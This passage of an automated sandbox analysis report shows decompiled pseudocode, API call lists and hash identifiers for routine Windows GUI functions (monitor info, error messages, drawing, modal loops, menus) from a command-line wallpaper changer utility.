                                  					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                  						 *((intOrPtr*)(_t29 + 4)) = 0;
                                  						 *((intOrPtr*)(_t29 + 8)) = 0;
                                  						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                  						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t31 = _t29;
                                  						 *(_t31 + 0x24) = 1;
                                  						if( *_t31 >= 0x4c) {
                                  							_push("DISPLAY");
                                  							_push(_t31 + 0x28);
                                  							L0040632C();
                                  						}
                                  						_t24 = 1;
                                  					}
                                  				} else {
                                  					_t26 =  *0x470918; // 0x42565c
                                  					 *0x470918 = E0042525C(5, _t23, _t26, _t27, _t29);
                                  					_t24 =  *0x470918(_t27, _t29);
                                  				}
                                  				return _t24;
                                  			}

                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004256B4
                                  • GetSystemMetrics.USER32 ref: 004256C9
                                  • GetSystemMetrics.USER32 ref: 004256D4
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 004256FE
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfoA$\VB
                                  • API String ID: 2545840971-2925803095
                                  • Opcode ID: 656fae020c2a21d011a6f8da84178655c790ed1f5ddaed347ee99df01d2165cd
                                  • Instruction ID: 85d5499ff39a5f1ee681518f8bcf01a75c21e5a03b702590deb2336c3e20234a
                                  • Opcode Fuzzy Hash: 656fae020c2a21d011a6f8da84178655c790ed1f5ddaed347ee99df01d2165cd
                                  • Instruction Fuzzy Hash: A31106B1742B24DFE3208F60AC447A7B7E8EB45310F41443AED0997241E3B4A940CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E00425730(intOrPtr _a4, intOrPtr* _a8) {
                                  				void _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t23;
                                  				int _t24;
                                  				intOrPtr _t26;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t29;
                                  				intOrPtr* _t31;
                                  
                                  				_t29 = _a8;
                                  				_t27 = _a4;
                                  				if( *0x470932 != 0) {
                                  					_t24 = 0;
                                  					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                  						 *((intOrPtr*)(_t29 + 4)) = 0;
                                  						 *((intOrPtr*)(_t29 + 8)) = 0;
                                  						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                  						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t31 = _t29;
                                  						 *(_t31 + 0x24) = 1;
                                  						if( *_t31 >= 0x4c) {
                                  							_push("DISPLAY");
                                  							_push(_t31 + 0x28);
                                  							L0040632C();
                                  						}
                                  						_t24 = 1;
                                  					}
                                  				} else {
                                  					_t26 =  *0x47091c; // 0x425730
                                  					 *0x47091c = E0042525C(6, _t23, _t26, _t27, _t29);
                                  					_t24 =  *0x47091c(_t27, _t29);
                                  				}
                                  				return _t24;
                                  			}

                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00425788
                                  • GetSystemMetrics.USER32 ref: 0042579D
                                  • GetSystemMetrics.USER32 ref: 004257A8
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 004257D2
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: 0WB$DISPLAY$GetMonitorInfoW
                                  • API String ID: 2545840971-636725853
                                  • Opcode ID: f3f387546b912440cb4908e1d9a688bd911ab3307b41073c9ae760e7094c4cab
                                  • Instruction ID: 04a0e49424eaff6356578b99823698d8527addfaa4e729d3004db5b68380df5b
                                  • Opcode Fuzzy Hash: f3f387546b912440cb4908e1d9a688bd911ab3307b41073c9ae760e7094c4cab
                                  • Instruction Fuzzy Hash: A711E4F1742B24DFD3208F61AC447A7B7E8EB85310F50452BED4AD7641D3B4A840CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00403F9C(void* __ecx) {
                                  				long _v4;
                                  				int _t3;
                                  
                                  				if( *0x470048 == 0) {
                                  					if( *0x46e030 == 0) {
                                  						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                  					}
                                  					return _t3;
                                  				} else {
                                  					if( *0x47021c == 0xd7b2 &&  *0x470224 > 0) {
                                  						 *0x470234();
                                  					}
                                  					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                  					return WriteFile(GetStdHandle(0xfffffff5), E00404024, 2,  &_v4, 0);
                                  				}
                                  			}






                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0046D564,00000000,?,00404063,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000), ref: 00403FD5
                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0046D564,00000000,?,00404063,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de]), ref: 00403FDB
                                  • GetStdHandle.KERNEL32(000000F5,00404024,00000002,0046D564,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0046D564,00000000,?,00404063), ref: 00403FF0
                                  • WriteFile.KERNEL32(00000000,000000F5,00404024,00000002,0046D564,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0046D564,00000000,?,00404063), ref: 00403FF6
                                  • MessageBoxA.USER32 ref: 00404014
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileHandleWrite$Message
                                  • String ID: Error$Runtime error at 00000000
                                  • API String ID: 1570097196-2970929446
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 39%
                                  			E00442B3C(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v28;
                                  				char _v44;
                                  				void* __edi;
                                  				void* __ebp;
                                  				void* _t46;
                                  				void* _t57;
                                  				intOrPtr _t85;
                                  				intOrPtr _t96;
                                  				void* _t117;
                                  				void* _t118;
                                  				void* _t127;
                                  				struct HDC__* _t136;
                                  				struct HDC__* _t137;
                                  				intOrPtr* _t138;
                                  				void* _t139;
                                  
                                  				_t119 = __ecx;
                                  				_t135 = __ecx;
                                  				_v8 = __edx;
                                  				_t118 = __eax;
                                  				_t46 = E004426DC(__eax);
                                  				if(_t46 != 0) {
                                  					_t142 = _a4;
                                  					if(_a4 == 0) {
                                  						__eflags =  *((intOrPtr*)(_t118 + 0x54));
                                  						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
                                  							_t138 = E004227C4(1);
                                  							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
                                  							E00423CDC(_t138, 1);
                                  							 *((intOrPtr*)( *_t138 + 0x40))();
                                  							_t119 =  *_t138;
                                  							 *((intOrPtr*)( *_t138 + 0x34))();
                                  						}
                                  						E0041DE78( *((intOrPtr*)(E00422D98( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
                                  						E004128F0(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
                                  						_push( &_v44);
                                  						_t57 = E00422D98( *((intOrPtr*)(_t118 + 0x54)));
                                  						_pop(_t127);
                                  						E0041E4E0(_t57, _t127);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0xffffffff);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(E0041E8D0(E00422D98( *((intOrPtr*)(_t118 + 0x54)))));
                                  						_push(_v8);
                                  						_push(E00442818(_t118));
                                  						L004251C4();
                                  						E004128F0(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
                                  						_v12 = E0041E8D0(E00422D98( *((intOrPtr*)(_t118 + 0x54))));
                                  						E0041DE78( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
                                  						_t136 = E0041E8D0(_t135);
                                  						SetTextColor(_t136, 0xffffff);
                                  						SetBkColor(_t136, 0);
                                  						_push(0xe20746);
                                  						_push(0);
                                  						_push(0);
                                  						_push(_v12);
                                  						_push( *((intOrPtr*)(_t118 + 0x30)));
                                  						_push( *((intOrPtr*)(_t118 + 0x34)));
                                  						_push(_a12 + 1);
                                  						_t85 = _a16 + 1;
                                  						__eflags = _t85;
                                  						_push(_t85);
                                  						_push(_t136);
                                  						L0040634C();
                                  						E0041DE78( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
                                  						_t137 = E0041E8D0(_t135);
                                  						SetTextColor(_t137, 0xffffff);
                                  						SetBkColor(_t137, 0);
                                  						_push(0xe20746);
                                  						_push(0);
                                  						_push(0);
                                  						_push(_v12);
                                  						_push( *((intOrPtr*)(_t118 + 0x30)));
                                  						_push( *((intOrPtr*)(_t118 + 0x34)));
                                  						_push(_a12);
                                  						_t96 = _a16;
                                  						_push(_t96);
                                  						_push(_t137);
                                  						L0040634C();
                                  						return _t96;
                                  					}
                                  					_push(_a8);
                                  					_push(E0044252C(_t142));
                                  					E00442B14(_t118, _t142);
                                  					_push(E0044252C(_t142));
                                  					_push(0);
                                  					_push(0);
                                  					_push(_a12);
                                  					_push(_a16);
                                  					_push(E0041E8D0(__ecx));
                                  					_push(_v8);
                                  					_t117 = E00442818(_t118);
                                  					_push(_t117);
                                  					L004251C4();
                                  					return _t117;
                                  				}
                                  				return _t46;
                                  			}





















                                  APIs
                                  • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00442B9B
                                  • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00442C3C
                                  • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00442C89
                                  • SetBkColor.GDI32(00000000,00000000), ref: 00442C91
                                  • 72E897E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 00442CB6
                                    • Part of subcall function 00442B14: 73452240.COMCTL32(00000000,?,00442B75,00000000,?), ref: 00442B2A
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: 73452430Color$73452240E897Text
                                  • String ID:
                                  • API String ID: 3108427945-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E004529F8(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				short _v22;
                                  				intOrPtr _v28;
                                  				struct HWND__* _v32;
                                  				char _v36;
                                  				intOrPtr _t53;
                                  				intOrPtr _t59;
                                  				intOrPtr _t65;
                                  				intOrPtr _t66;
                                  				intOrPtr _t69;
                                  				intOrPtr _t70;
                                  				intOrPtr _t72;
                                  				intOrPtr _t74;
                                  				intOrPtr _t84;
                                  				intOrPtr _t86;
                                  				intOrPtr _t89;
                                  				void* _t94;
                                  				intOrPtr _t128;
                                  				void* _t130;
                                  				void* _t133;
                                  				void* _t134;
                                  				intOrPtr _t135;
                                  
                                  				_t131 = __esi;
                                  				_t130 = __edi;
                                  				_t111 = __ebx;
                                  				_t133 = _t134;
                                  				_t135 = _t134 + 0xffffffe0;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_v36 = 0;
                                  				_v8 = __eax;
                                  				_push(_t133);
                                  				_push(0x452cd4);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t135;
                                  				E00433300();
                                  				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x328) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x247)) == 1) {
                                  					_t53 =  *0x46fb90; // 0x41b650
                                  					E00405C70(_t53,  &_v36);
                                  					E0040B830(_v36, 1);
                                  					E00403B64();
                                  				}
                                  				if(GetCapture() != 0) {
                                  					SendMessageA(GetCapture(), 0x1f, 0, 0);
                                  				}
                                  				ReleaseCapture();
                                  				_t59 =  *0x470b40; // 0x0
                                  				E004550EC(_t59);
                                  				_push(_t133);
                                  				_push(0x452cb7);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t135;
                                  				 *(_v8 + 0x328) =  *(_v8 + 0x328) | 0x00000008;
                                  				if( *((char*)(_v8 + 0x300)) == 0) {
                                  					E00438B2C(_v8);
                                  				}
                                  				_v32 = GetActiveWindow();
                                  				_v20 = E0044C420();
                                  				_t65 =  *0x470b44; // 0x0
                                  				_t66 =  *0x470b44; // 0x0
                                  				E00413DA8( *((intOrPtr*)(_t66 + 0x7c)),  *((intOrPtr*)(_t65 + 0x78)), 0);
                                  				_t69 =  *0x470b44; // 0x0
                                  				 *((intOrPtr*)(_t69 + 0x78)) = _v8;
                                  				_t70 =  *0x470b44; // 0x0
                                  				_v22 =  *(_t70 + 0x44) & 0x0000ffff;
                                  				_t72 =  *0x470b44; // 0x0
                                  				E00453FAC(_t72, 0);
                                  				_t74 =  *0x470b44; // 0x0
                                  				_v28 =  *((intOrPtr*)(_t74 + 0x48));
                                  				_v16 = E0044C504(0, _t111, _t130, _t131);
                                  				_push(_t133);
                                  				_push(0x452c95);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t135;
                                  				E00452918(_v8);
                                  				_push(_t133);
                                  				_push(0x452bf4);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t135;
                                  				SendMessageA(E0043BA58(_v8), 0xb000, 0, 0);
                                  				 *((intOrPtr*)(_v8 + 0x264)) = 0;
                                  				do {
                                  					_t84 =  *0x470b40; // 0x0
                                  					E00456250(_t84);
                                  					_t86 =  *0x470b40; // 0x0
                                  					if( *((char*)(_t86 + 0xa4)) == 0) {
                                  						if( *((intOrPtr*)(_v8 + 0x264)) != 0) {
                                  							E00452878(_v8);
                                  						}
                                  					} else {
                                  						 *((intOrPtr*)(_v8 + 0x264)) = 2;
                                  					}
                                  					_t89 =  *((intOrPtr*)(_v8 + 0x264));
                                  				} while (_t89 == 0);
                                  				_v12 = _t89;
                                  				SendMessageA(E0043BA58(_v8), 0xb001, 0, 0);
                                  				_t94 = E0043BA58(_v8);
                                  				if(_t94 != GetActiveWindow()) {
                                  					_v32 = 0;
                                  				}
                                  				_pop(_t128);
                                  				 *[fs:eax] = _t128;
                                  				_push(0x452bfb);
                                  				return E00452910();
                                  			}





























                                  APIs
                                  • GetCapture.USER32 ref: 00452A69
                                  • GetCapture.USER32 ref: 00452A78
                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00452A7E
                                  • ReleaseCapture.USER32(00000000,00452CD4), ref: 00452A83
                                  • GetActiveWindow.USER32 ref: 00452ABE
                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00452B54
                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00452BC1
                                  • GetActiveWindow.USER32 ref: 00452BD0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                  • String ID:
                                  • API String ID: 862346643-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004398E8(intOrPtr __eax, void* __ebx, void* __ecx, struct HDC__* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				struct HDC__* _v12;
                                  				int _v16;
                                  				struct tagRECT _v32;
                                  				signed int _t68;
                                  				intOrPtr _t74;
                                  				intOrPtr _t81;
                                  				int _t102;
                                  				void* _t104;
                                  				void* _t105;
                                  				intOrPtr _t119;
                                  				int _t125;
                                  				void* _t126;
                                  				void* _t129;
                                  
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				 *(_v8 + 0x54) =  *(_v8 + 0x54) | 0x00000080;
                                  				_v16 = SaveDC(_v12);
                                  				_push(_t129);
                                  				_push(0x439a60);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t129 + 0xffffffe4;
                                  				E004333E0(_v12, _a4, __ecx);
                                  				IntersectClipRect(_v12, 0, 0,  *(_v8 + 0x48),  *(_v8 + 0x4c));
                                  				_t102 = 0;
                                  				_t125 = 0;
                                  				if((GetWindowLongA(E0043BA58(_v8), 0xffffffec) & 0x00000002) == 0) {
                                  					_t68 = GetWindowLongA(E0043BA58(_v8), 0xfffffff0);
                                  					__eflags = _t68 & 0x00800000;
                                  					if((_t68 & 0x00800000) != 0) {
                                  						_t125 = 3;
                                  						_t102 = 0xa00f;
                                  					}
                                  				} else {
                                  					_t125 = 0xa;
                                  					_t102 = 0x200f;
                                  				}
                                  				if(_t102 != 0) {
                                  					SetRect( &_v32, 0, 0,  *(_v8 + 0x48),  *(_v8 + 0x4c));
                                  					DrawEdge(_v12,  &_v32, _t125, _t102);
                                  					E004333E0(_v12, _v32.top, _v32.left);
                                  					IntersectClipRect(_v12, 0, 0, _v32.right - _v32.left, _v32.bottom - _v32.top);
                                  				}
                                  				E00435DE4(_v8, _v12, 0x14, 0);
                                  				E00435DE4(_v8, _v12, 0xf, 0);
                                  				_t74 =  *((intOrPtr*)(_v8 + 0x1a4));
                                  				if(_t74 == 0) {
                                  					L12:
                                  					_pop(_t119);
                                  					 *[fs:eax] = _t119;
                                  					_push(0x439a67);
                                  					return RestoreDC(_v12, _v16);
                                  				} else {
                                  					_t104 =  *((intOrPtr*)(_t74 + 8)) - 1;
                                  					if(_t104 < 0) {
                                  						goto L12;
                                  					}
                                  					_t105 = _t104 + 1;
                                  					_t126 = 0;
                                  					do {
                                  						_t81 = E00413D2C( *((intOrPtr*)(_v8 + 0x1a4)), _t126);
                                  						_t138 =  *((char*)(_t81 + 0x57));
                                  						if( *((char*)(_t81 + 0x57)) != 0) {
                                  							E004398E8(_t81, _t105,  *((intOrPtr*)(_t81 + 0x40)), _v12, _t126, _t138,  *((intOrPtr*)(_t81 + 0x44)));
                                  						}
                                  						_t126 = _t126 + 1;
                                  						_t105 = _t105 - 1;
                                  					} while (_t105 != 0);
                                  					goto L12;
                                  				}
                                  			}

                                  APIs
                                  • SaveDC.GDI32(?), ref: 00439905
                                    • Part of subcall function 004333E0: GetWindowOrgEx.GDI32(?), ref: 004333EE
                                    • Part of subcall function 004333E0: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00433404
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043993E
                                  • GetWindowLongA.USER32 ref: 00439952
                                  • GetWindowLongA.USER32 ref: 00439973
                                  • SetRect.USER32 ref: 004399A3
                                  • DrawEdge.USER32(?,?,00000000,00000000), ref: 004399B2
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 004399DB
                                  • RestoreDC.GDI32(?,?), ref: 00439A5A
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                  • String ID:
                                  • API String ID: 2976466617-0
                                  • Opcode ID: 074dd23cf7a33f5f16385952daeb72322e8332cc8c4654a74bf5d61295c337b3
                                  • Instruction ID: c6099c43392067a62c403d720c5dc63d718564cbc045319a2f27b1468a8bcaef
                                  • Opcode Fuzzy Hash: 074dd23cf7a33f5f16385952daeb72322e8332cc8c4654a74bf5d61295c337b3
                                  • Instruction Fuzzy Hash: 9D411275B00209AFDB10EBD9C985F9EB7F8EF48304F1141A9B604E7392C679AE41CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 26%
                                  			E0041F22C(void* __ebx) {
                                  				intOrPtr _v8;
                                  				char _v1000;
                                  				char _v1004;
                                  				char _v1032;
                                  				signed int _v1034;
                                  				short _v1036;
                                  				void* _t24;
                                  				intOrPtr _t25;
                                  				intOrPtr _t27;
                                  				intOrPtr _t29;
                                  				intOrPtr _t45;
                                  				intOrPtr _t52;
                                  				void* _t54;
                                  				void* _t55;
                                  
                                  				_t54 = _t55;
                                  				_v1036 = 0x300;
                                  				_v1034 = 0x10;
                                  				_t25 = E00402990(_t24, 0x40,  &_v1032);
                                  				_push(0);
                                  				L004066E4();
                                  				_v8 = _t25;
                                  				_push(_t54);
                                  				_push(0x41f329);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t55 + 0xfffffbf8;
                                  				_push(0x68);
                                  				_t27 = _v8;
                                  				_push(_t27);
                                  				L0040641C();
                                  				_t45 = _t27;
                                  				if(_t45 >= 0x10) {
                                  					_push( &_v1032);
                                  					_push(8);
                                  					_push(0);
                                  					_push(_v8);
                                  					L0040645C();
                                  					if(_v1004 != 0xc0c0c0) {
                                  						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                                  						_push(8);
                                  						_push(_t45 - 8);
                                  						_push(_v8);
                                  						L0040645C();
                                  					} else {
                                  						_push( &_v1004);
                                  						_push(1);
                                  						_push(_t45 - 8);
                                  						_push(_v8);
                                  						L0040645C();
                                  						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                                  						_push(7);
                                  						_push(_t45 - 7);
                                  						_push(_v8);
                                  						L0040645C();
                                  						_push( &_v1000);
                                  						_push(1);
                                  						_push(7);
                                  						_push(_v8);
                                  						L0040645C();
                                  					}
                                  				}
                                  				_pop(_t52);
                                  				 *[fs:eax] = _t52;
                                  				_push(0x41f330);
                                  				_t29 = _v8;
                                  				_push(_t29);
                                  				_push(0);
                                  				L00406944();
                                  				return _t29;
                                  			}

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0041F25A
                                  • 72E7AD70.GDI32(?,00000068,00000000,0041F329,?,00000000), ref: 0041F276
                                  • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041F329,?,00000000), ref: 0041F295
                                  • 72E7AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0041F329,?,00000000), ref: 0041F2B9
                                  • 72E7AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0041F329), ref: 0041F2D7
                                  • 72E7AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0041F2EB
                                  • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041F329,?,00000000), ref: 0041F30B
                                  • 72E7B380.USER32(00000000,?,0041F330,0041F329,?,00000000), ref: 0041F323
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: 0c8ae948ccdd0cc1e4134a642f555508580253623807d761c58ee06e0a323977
                                  • Instruction ID: e4002b565367df740e72fffb50d85b4a1618d582a5525bca69be1438e7c1dba7
                                  • Opcode Fuzzy Hash: 0c8ae948ccdd0cc1e4134a642f555508580253623807d761c58ee06e0a323977
                                  • Instruction Fuzzy Hash: FE2186F1A40318AADB10DBA5CD81FAE73ACEB08704F5104A6FB09F71C1D6799E558B2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E004454A8(void* __eax, void* __ebx, signed char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				signed char _v9;
                                  				signed char _v10;
                                  				struct tagMENUITEMINFOA _v58;
                                  				char _v64;
                                  				intOrPtr _t102;
                                  				CHAR* _t108;
                                  				signed char _t114;
                                  				signed short _t147;
                                  				void* _t152;
                                  				intOrPtr _t158;
                                  				intOrPtr _t174;
                                  				struct HMENU__* _t176;
                                  				int _t180;
                                  				void* _t182;
                                  				intOrPtr _t183;
                                  				void* _t186;
                                  				void* _t195;
                                  
                                  				_t153 = __ecx;
                                  				_v64 = 0;
                                  				_v8 = 0;
                                  				_v9 = __ecx;
                                  				_t176 = __edx;
                                  				_t152 = __eax;
                                  				_push(_t186);
                                  				_push(0x4456f9);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t186 + 0xffffffc4;
                                  				if( *((char*)(__eax + 0x3e)) == 0) {
                                  					L22:
                                  					_pop(_t158);
                                  					 *[fs:eax] = _t158;
                                  					_push(0x445700);
                                  					E0040411C( &_v64);
                                  					return E0040411C( &_v8);
                                  				}
                                  				E004041B4( &_v8,  *((intOrPtr*)(__eax + 0x30)));
                                  				if(E00447460(_t152) <= 0) {
                                  					__eflags =  *(_t152 + 0x60);
                                  					if( *(_t152 + 0x60) == 0) {
                                  						L8:
                                  						if((GetVersion() & 0x000000ff) < 4) {
                                  							_t180 =  *(0x46eec0 + ((E00404528( *((intOrPtr*)(_t152 + 0x30)), 0x44571c) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *(0x46eeb4 + ( *(_t152 + 0x48) & 0x000000ff) * 4) |  *(0x46eea4 + ( *(_t152 + 0x38) & 0x000000ff) * 4) |  *(0x46eeac + ( *(_t152 + 0x39) & 0x000000ff) * 4) | 0x00000400;
                                  							_t102 = E00447460(_t152);
                                  							__eflags = _t102;
                                  							if(_t102 <= 0) {
                                  								InsertMenuA(_t176, 0xffffffff, _t180,  *(_t152 + 0x50) & 0x0000ffff, E004045DC(_v8));
                                  							} else {
                                  								_t108 = E004045DC( *((intOrPtr*)(_t152 + 0x30)));
